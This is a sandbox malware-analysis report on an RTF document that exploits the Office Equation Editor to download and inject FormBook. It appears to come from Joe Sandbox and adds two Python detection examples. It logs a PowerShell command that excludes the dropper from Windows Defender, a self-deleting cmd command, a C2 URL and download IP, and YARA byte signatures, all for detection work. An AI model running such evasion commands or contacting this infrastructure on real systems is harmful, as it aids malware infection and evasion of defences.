Windows Analysis Report
na.doc

Overview

General Information

Sample name: na.doc
Analysis ID: 1545184
MD5: 1e6c06ed300dd4d6744f43efd6cc36a2
SHA1: 8aaece78eaab5c434c8b9a88a1b154a09f800d16
SHA256: dbde17546d423c444465c7f4bbecd593e99c4d43136269bb7f1f3be544d716eb
Tags: doc, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3484 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3568 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • ihbgfbin.exe (PID: 3736 cmdline: "C:\Users\user\AppData\Roaming\ihbgfbin.exe" MD5: 6A39668F48A502DBFA3CC13C7F463281)
        • powershell.exe (PID: 3816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • ihbgfbin.exe (PID: 3824 cmdline: "C:\Users\user\AppData\Roaming\ihbgfbin.exe" MD5: 6A39668F48A502DBFA3CC13C7F463281)
          • explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • mstsc.exe (PID: 3948 cmdline: "C:\Windows\SysWOW64\mstsc.exe" MD5: 4676AAA9DDF52A50C829FEDB4EA81E54)
              • cmd.exe (PID: 3972 cmdline: /c del "C:\Users\user\AppData\Roaming\ihbgfbin.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
    • EQNEDT32.EXE (PID: 4048 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
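The process tree above, together with the Sigma process-creation hits further down, describes one detection chain: an Office application spawning EQNEDT32.EXE, the Equation Editor spawning a binary from the user's profile, that binary launching PowerShell with Add-MpPreference -ExclusionPath, and a hollowed mstsc.exe using cmd.exe to delete the dropper. The Python below is an added example, not part of the Joe Sandbox report, that runs those heuristics over constructed process-creation records mirroring the tree. PIDs and paths come from the tree; the cmd.exe image path, WINWORD's parent PID of 0 and the list of system binaries not expected to spawn children are assumptions. The -EncodedCommand decoding goes beyond what this sample did and covers the base64-encoded variant that the "Powershell Base64 Encoded MpPreference Cmdlet" Sigma rule targets.

```python
"""Process-tree triage for the Office -> Equation Editor -> dropper chain (added example)."""
import base64
import re
from dataclasses import dataclass

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
EQNEDT = "eqnedt32.exe"
NO_CHILDREN_EXPECTED = {"mstsc.exe"}   # assumption: an RDP client has no business spawning processes
USER_WRITABLE = re.compile(r"^c:\\users\\[^\\]+\\appdata\\", re.IGNORECASE)
DEFENDER_EXCLUSION = re.compile(
    r"(add|set)-mppreference\b.*-exclusion(path|process|extension)", re.IGNORECASE)
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
DEL_TARGET = re.compile(r'\bdel\b\s+"?([^"]+?)"?\s*$', re.IGNORECASE)


@dataclass
class ProcEvent:
    """The Sysmon EventID 1 fields the rules below need."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def encode_powershell_command(text: str) -> str:
    """Produce what PowerShell expects after -EncodedCommand: base64 of UTF-16LE."""
    return base64.b64encode(text.encode("utf-16le")).decode("ascii")


def effective_cmdline(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload, if any, so the cleartext cmdlet is visible."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def triage(events):
    """Return (pid, tag) findings for the chain seen in the process tree."""
    by_pid = {e.pid: e for e in events}
    images = {e.image.lower() for e in events}
    findings = []
    for e in events:
        img = basename(e.image)
        parent = by_pid.get(e.ppid)
        pimg = basename(parent.image) if parent else ""
        cmd = effective_cmdline(e.cmdline)
        if pimg in OFFICE_IMAGES and img == EQNEDT:
            findings.append((e.pid, "office_spawns_equation_editor"))
        if pimg == EQNEDT:                      # Equation Editor should never spawn anything
            tag = "equation_editor_child"
            if USER_WRITABLE.match(e.image):
                tag += "_in_user_dir"
            findings.append((e.pid, tag))
        if pimg in NO_CHILDREN_EXPECTED:
            findings.append((e.pid, "unexpected_child_of_" + pimg))
        if img == "powershell.exe" and DEFENDER_EXCLUSION.search(cmd):
            findings.append((e.pid, "defender_exclusion_added"))
        if img == "cmd.exe":
            m = DEL_TARGET.search(cmd)
            if m and m.group(1).lower() in images:   # deleting a binary that ran in this tree
                findings.append((e.pid, "deletes_dropped_binary"))
    return findings


# Constructed records mirroring the report's process tree (PIDs and paths from the tree;
# the cmd.exe image path and WINWORD's parent PID 0 are assumptions).
EQN = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
DROPPER = r"C:\Users\user\AppData\Roaming\ihbgfbin.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(3484, 0, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE", '"WINWORD.EXE" /Automation -Embedding'),
    ProcEvent(3568, 3484, EQN, '"' + EQN + '" -Embedding'),
    ProcEvent(3736, 3568, DROPPER, '"' + DROPPER + '"'),
    ProcEvent(3816, 3736, PS, '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
              'Add-MpPreference -ExclusionPath "' + DROPPER + '"'),
    ProcEvent(3824, 3736, DROPPER, '"' + DROPPER + '"'),
    ProcEvent(3948, 1244, r"C:\Windows\SysWOW64\mstsc.exe", r'"C:\Windows\SysWOW64\mstsc.exe"'),
    ProcEvent(3972, 3948, r"C:\Windows\SysWOW64\cmd.exe", '/c del "' + DROPPER + '"'),
]

if __name__ == "__main__":
    for pid, tag in triage(SAMPLE_EVENTS):
        print(pid, tag)
```

The self-deletion check deliberately compares the del target against images seen in the same event set rather than against a fixed path, so it also catches a dropper that was renamed between runs; the Defender-exclusion check looks at the decoded command line, which is what matters when the cmdlet is hidden behind -EncodedCommand.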
Malware Configuration

FormBook: {"C2 list": ["www.lifeofthobes.uk/btrd/"], "decoy": ["toulouse.gold", "launchyouglobal.com", "margarita-services.com", "dasnail.club", "casa-hilo.com", "hardscapesofflorida.com", "thepositivitypulse.com", "kkmyanev.cfd", "love6ace22.top", "castorcruise.com", "chch6.com", "h59f07jy.cfd", "saatvikteerthyatra.com", "fxsecuretrading-option.com", "mostbet-k1o.click", "36-m.beauty", "ko-or-a-news.com", "eurekatextile.com", "gynlkj.com", "deepsouthcraftsman.com", "bougiebossbabe.com", "202402.xyz", "thecareskin.com", "zimmerli.online", "bathroomconnectsupreme.com", "opmk.monster", "docemimocasamentos.com", "mywayinist.com", "healthyters.com", "mozartchamberorchestra.sydney", "wewillrock.club", "education2jobs.com", "everlastdisposal.com", "valentinascrochet.com", "stewartvaluation.net", "blackphoenix01.xyz", "omnikart.shop", "jejeesclothing.com", "allurepet.site", "futureofaustin.com", "sillylittlestory.com", "inthewoodsdesigns.com", "freshtraining.store", "illuminati4me.com", "jewishlakecounty.com", "devadecoration.com", "nashexshop.com", "martline.website", "affirmationtotebags.com", "golifestyles.com", "telegood.info", "trygenesisx.com", "bestwhitetee.com", "delicatemayhem.com", "redyardcom.com", "solarcyborg.com", "emotieloos.com", "fanatics-international.com", "ballonsmagiques.com", "projektincognito.com", "fcno30.com", "horizonoutdoorservices.com", "couturewrap.com", "mbbwa4wp.cfd"]}
Source | Rule | Description | Author | Strings
na.doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen
  • 0x69fbf: $obj2: \objdata
  • 0x69fd9: $obj3: \objupdate
Source | Rule | Description | Author | Strings
00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Diceloader_15eeb7b9 | unknown | unknown
  • 0x2b9: $a1: E9 92 9D FF FF C3 E8
0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Diceloader_15eeb7b9 | unknown | unknown
  • 0x1f2b9: $a1: E9 92 9D FF FF C3 E8
0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251: $a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb90: $a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf: $a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7: $a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
(29 further memory-dump matches not listed)
Source | Rule | Description | Author | Strings
7.2.ihbgfbin.exe.400000.0.unpack | Windows_Trojan_Diceloader_15eeb7b9 | unknown | unknown
  • 0x1e4b9: $a1: E9 92 9D FF FF C3 E8
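The INDICATOR_RTF_MalVer_Objects hit above fired on \objdata and \objupdate, and the signature list separately notes that the initial sample is an obfuscated RTF. The Python below is an added triage example, not the YARA rule and not Joe Sandbox code: it checks the RTF version header (Word only writes {\rtf1), flags \objupdate (which forces the object to be updated when the document is opened, so no user click is needed), hex-decodes each \objdata group and parses the OLE1 ObjectHeader from [MS-OLEDS] to recover the class name and native payload. The sample document is constructed inline; the decoder assumes the \objdata hex is not interleaved with obfuscating control words (for such samples use a full RTF parser such as oletools' rtfobj).

```python
"""Static triage of RTF files for embedded OLE1 objects (added example, not Joe Sandbox code)."""
import re
import struct

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # compound-file signature
RTF_HEADER = re.compile(rb"^\{\\rtf1\b")            # Word only ever writes version 1


def extract_objdata_blobs(rtf: bytes):
    r"""Yield the hex-decoded payload of every {\*\objdata ...} group.

    Assumption: the group holds plain hex (whitespace allowed); heavily obfuscated
    samples interleave control words and need a full RTF tokenizer instead.
    """
    for m in re.finditer(rb"\\objdata\b", rtf):
        depth, i = 1, m.end()
        start = i
        while i < len(rtf) and depth:          # walk to the brace closing this group
            c = rtf[i:i + 1]
            if c == b"{":
                depth += 1
            elif c == b"}":
                depth -= 1
            i += 1
        hexchars = re.sub(rb"\s+", b"", rtf[start:i - 1])
        try:
            yield bytes.fromhex(hexchars.decode("ascii"))
        except ValueError:                      # odd length or non-hex: not parseable here
            continue


def parse_ole1(blob: bytes) -> dict:
    """Parse the OLE1 ObjectHeader ([MS-OLEDS] 2.2.4) and, for FormatID 2
    (EmbeddedObject), the NativeDataSize/NativeData that follow it."""
    off = 0

    def dword():
        nonlocal off
        (v,) = struct.unpack_from("<I", blob, off)
        off += 4
        return v

    def lp_string():                            # LengthPrefixedAnsiString
        nonlocal off
        n = dword()
        s = blob[off:off + n]
        off += n
        return s.rstrip(b"\x00").decode("latin-1")

    version, format_id = dword(), dword()
    class_name, _topic, _item = lp_string(), lp_string(), lp_string()
    native = b""
    if format_id == 2:
        size = dword()
        native = blob[off:off + size]
    return {"version": version, "format_id": format_id,
            "class_name": class_name, "native": native}


def triage_rtf(rtf: bytes) -> list:
    findings = []
    if not RTF_HEADER.match(rtf):
        findings.append("non_standard_rtf_header")
    if re.search(rb"\\objupdate\b", rtf):       # object refreshed on open, no click needed
        findings.append("objupdate_auto_load")
    for blob in extract_objdata_blobs(rtf):
        try:
            obj = parse_ole1(blob)
        except struct.error:
            findings.append("malformed_ole1_header")
            continue
        if obj["class_name"].lower().startswith("equation"):
            findings.append("equation_editor_object:" + obj["class_name"])
        if obj["native"].startswith(OLE2_MAGIC):
            findings.append("ole2_compound_file_payload")
        if obj["native"][:2] == b"MZ":
            findings.append("pe_payload")
    return findings


def build_sample_rtf() -> bytes:
    r"""Constructed test document (not the analysed na.doc): a version-less header,
    \objupdate, and an OLE1 EmbeddedObject of class Equation.3 whose native data is
    just a compound-file signature padded with zeros."""
    native = OLE2_MAGIC + b"\x00" * 24
    cls = b"Equation.3\x00"
    header = (struct.pack("<II", 0x00000501, 2)
              + struct.pack("<I", len(cls)) + cls
              + struct.pack("<II", 0, 0))         # empty TopicName and ItemName
    blob = header + struct.pack("<I", len(native)) + native
    return (b"{\\rtf\\ansi\\deff0{\\object\\objemb\\objupdate\\objw100\\objh100"
            b"{\\*\\objclass Equation.3}{\\*\\objdata " + blob.hex().encode("ascii")
            + b"}}}")
```

An Equation.3 class name combined with \objupdate is the shape the Equation Editor exploits take; the class name is read from the OLE1 header rather than from \objclass because the latter is free text that attackers routinely omit or falsify.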

Exploits

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 87.120.84.38, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3568, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3568, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4q0pGnqqpgTTSL7[1].exe

System Summary

Source: Network Connection | Author: Max Altgelt (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3568, Protocol: tcp, SourceIp: 87.120.84.38, SourceIsIpv6: false, SourcePort: 80
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", ParentImage: C:\Users\user\AppData\Roaming\ihbgfbin.exe, ParentProcessId: 3736, ParentProcessName: ihbgfbin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", ProcessId: 3816, ProcessName: powershell.exe
Source: Process started | Author: Jason Lynch | Data: Command: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ihbgfbin.exe, NewProcessName: C:\Users\user\AppData\Roaming\ihbgfbin.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ihbgfbin.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3568, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", ProcessId: 3736, ProcessName: ihbgfbin.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ihbgfbin.exe, NewProcessName: C:\Users\user\AppData\Roaming\ihbgfbin.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ihbgfbin.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3568, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", ProcessId: 3736, ProcessName: ihbgfbin.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", ParentImage: C:\Users\user\AppData\Roaming\ihbgfbin.exe, ParentProcessId: 3736, ParentProcessName: ihbgfbin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", ProcessId: 3816, ProcessName: powershell.exe
Source: Registry Key set | Author: frack113 | Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3568, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", ParentImage: C:\Users\user\AppData\Roaming\ihbgfbin.exe, ParentProcessId: 3736, ParentProcessName: ihbgfbin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", ProcessId: 3816, ProcessName: powershell.exe
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3484, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3816, TargetFilename: C:\Users\user\AppData\Local\Temp\zfjdguxk.xia.ps1

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-30T08:38:51.849816+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49164 | 13.248.213.45 | 80 | TCP
2024-10-30T08:40:34.568080+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49165 | 68.66.226.117 | 80 | TCP
2024-10-30T08:37:29.702583+0100 | 2022050 | 1 | A Network Trojan was detected | 87.120.84.38 | 80 | 192.168.2.22 | 49163 | TCP
2024-10-30T08:37:30.054009+0100 | 2022051 | 1 | A Network Trojan was detected | 87.120.84.38 | 80 | 192.168.2.22 | 49163 | TCP
2024-10-30T08:37:30.054009+0100 | 2827449 | 1 | Attempted User Privilege Gain | 87.120.84.38 | 80 | 192.168.2.22 | 49163 | TCP

AV Detection

Source: na.doc | Avira: detected
Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook (same configuration as extracted above: C2 www.lifeofthobes.uk/btrd/ plus the decoy domain list)
Source: na.doc | ReversingLabs: Detection: 39%
Source: Yara match | File source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4q0pGnqqpgTTSL7[1].exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_009640B9 CryptDecodeObject,LocalAlloc,CryptDecodeObject,LocalFree,GetLastError
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_009569BE memset,CryptSignMessage,CryptSignMessage,GetLastError,GetLastError,GetLastError,LocalAlloc,CryptSignMessage,GetLastError,GetLastError,GetLastError,LocalFree,CertFreeCertificateChain
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_009579B8 CryptMsgOpenToDecode,GetLastError,GetLastError,GetLastError,CryptMsgUpdate,GetLastError,GetLastError,GetLastError,CertOpenStore,CryptMsgClose
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00957135 CryptVerifyDetachedMessageSignature,GetLastError,GetLastError,GetLastError,GetLastError,CertFreeCertificateContext,CertFreeCertificateChain,CertCloseStore
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00963AD1 CryptProtectData,LocalAlloc,memcpy,LocalFree
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0094D3DF CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00963C77 CryptUnprotectData,LocalAlloc,memcpy,LocalFree
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00963DD8 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_009435FC memset,CryptUIDlgViewCertificateW,GetLastError
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0094D561 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00963F45 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 87.120.84.38 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\ihbgfbin.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb | source: ihbgfbin.exe, ihbgfbin.exe, 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 0000000A.00000003.429889200.0000000002100000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000000A.00000002.928676089.0000000002410000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000000A.00000003.429589348.0000000001FA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mstsc.pdb | source: ihbgfbin.exe, 00000007.00000002.429868517.0000000002770000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, mstsc.exe, 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp
